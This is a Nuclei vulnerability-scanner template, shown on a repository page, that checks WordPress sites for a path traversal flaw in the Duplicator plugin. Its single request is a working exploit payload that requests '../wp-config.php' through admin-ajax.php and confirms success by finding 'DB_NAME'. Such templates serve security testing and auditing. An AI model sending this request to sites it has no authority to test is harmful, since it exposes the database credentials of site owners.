nuclei-templates/vulnerabilities/wordpress-duplicator-path-t...

17 lines
331 B
YAML
Raw Normal View History

id: wp-duplicator-lfi
info:
name: WordPress duplicator Path Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
2020-09-09 15:08:12 +00:00
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php"
matchers:
- type: word
words:
2020-05-24 22:19:21 +00:00
- "DB_NAME"
part: body